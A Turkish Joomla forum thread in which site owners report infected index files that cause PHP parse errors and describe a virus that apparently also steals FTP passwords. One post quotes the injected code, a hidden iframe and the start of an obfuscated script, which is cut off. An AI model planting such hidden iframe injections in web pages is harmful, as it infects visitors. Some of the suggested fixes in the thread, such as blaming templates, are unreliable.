Parse error: syntax error, unexpected '<' in /home/sim/public_html/index.php on

Joomla! 1.5.x Kategorisinde ve Güvenlik & Performans Forumunda Bulunan Parse error: syntax error, unexpected '<' in /home/sim/public_html/index.php on Konusunu Görüntülemektesiniz, Konu İçerigi Kısaca ->> Parse error: syntax error, unexpected '<' in /home/sim/public_html/index.php on line 89 sitede böyle bir sorunla karsılastım durduk yere iki dündür ...

+ Konu Cevapla
1. Sayfa - Toplam 5 Sayfa var 1 2 3 ... SonuncuSonuncu
Gösterilen sonuçlar: 1 ile 10 ve 45
    Yeni Joomlacı hackedbyspy - ait Kullanıcı Resmi (Avatar)

Parse error: syntax error, unexpected '<' in /home/sim/public_html/index.php on

Parse error: syntax error, unexpected '<' in /home/sim/public_html/index.php on line 89

sitede böyle bir sorunla karsılastım durduk yere iki dündür sitee hiçbir makale vs eklememıstım bugun giriyimekliyim dedim sitede sadece bole bir yazı cıkıyor yonetım panelıne gırebılıyorum önizzleme yaptıgımda boyle bi hata alıyorum
    Konu hackedbyspy tarafından (12-16-2008 Saat 22:09 ) değiştirilmiştir.

bu konuyu actıktan sonra arastırdım bu bır virusmus benımle aynı sorunu yasayan arkadaslar varsa burayı okuyunca anlayacaklar

sitedeki butun index.php lere bulasıyor bu vırus arkadaslar index isimli ne varsa hepsine html asp ayırmıyor default larada bulasan bır vırus ana sayfamdakı index.asp ye baktım en altında
    <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l494444f01a338

bu kodu eklıyor hemen joomla 1.5.8 i indirdim tabi bundan once pc ye format attım sonra ındırdım index.asp lerı karsılastırdım sadece alttakı kod eklenmıs onun harıcındekı herşeyi aynı hemen cpnelden sıfremı deıstırm ftp den sonra 1.5.8 in içindekı index php yı attım eskısını sılıp su anda sayfam acılıyor zaten

adminstrator klasorundekı index.php dosyasını ındırıp baktım onada eklemıs kodu bırazdan onuda duzeltıcem boyle tek tek ugrasmak gerekiyor sanırım

ama admın panelıne ulasabılıyorum yanı o sayfada herhangıbır problem yok sadece ana sayfadaydı sorun sılmesem olurmu acaba veya

bu dosyaları daha hızlı zahmetsız nasıl duzeltebılecegım..

not butun ftplerı calıyor bu vırus once format attın sonra sıfreyı deıstırın

Profesyonel SonBahar - ait Kullanıcı Resmi (Avatar)

Dosyaların içinden tek tek silmek yerine yeni dosyaları direk üstüne yapıştır..

ana sayfa index.php yi deiştirdim sadece site acıldı fakat diger yerlere baktım kod yok olmus 2 gundur calısıo sıte bugun yine gitti saatler once acılan sıte sımdı yıne aynı hatayı verdı anlamadım gıttı ben bu virusu hosta kendımı atıyodur nedır benim pcimdemi anti virde var anlamadım bi cozum bulalım suna

tek tek silmeden ustune atarsam benim içindeki dokumanlar silinmezmi

yazdıgım makaleler vs

Üyeliği Durduruldu Bogart - ait Kullanıcı Resmi (Avatar)

Konple Sil Yeniden Kur Joomla' yı Bu Arada Lütfen hackedbyspy Şeklinde Kullanıcı Adınızı Değiştiriniz Aksi Halde Kurallara Aykırı Kullanıcı Olduğunuzu Saptarlar Ve Üyeliğiniz Silinebilir.

komple sil diyosun tekrar kur diosunda yazdıgım makalelerı ne yapıcam

Yeni Joomlacı talesoft - ait Kullanıcı Resmi (Avatar)

Bende aynı sorunu yaşıyorum.. Lütfen birisi pratik bir yol biliyorsa söylesin..Zira,zor durumdayım.

Sıtkı KOVALI Lanethli - ait Kullanıcı Resmi (Avatar)

templatenizi degisniz bu sorunlar template lerden kaynaklanmaktadır...

Yeni Joomlacı wobber - ait Kullanıcı Resmi (Avatar)

Standart aynı sorun

Aynı sorun bende de var virüsü olan bi adrese yönlendiriyor.filist e baktıgımda şunlar var
    ./components/com_weblinks/models/index.html
    ./components/com_weblinks/helpers/index.html
    ./components/com_weblinks/controllers/index.html

Yeni Joomlacı talesoft - ait Kullanıcı Resmi (Avatar)

Aynı sorunu 4 sitemde yaşıyorum.. Bende çok çaresiz kaldım çözüm bulamıyorum akşama kadar sayfaları yenileyip yenileyip duruyorum.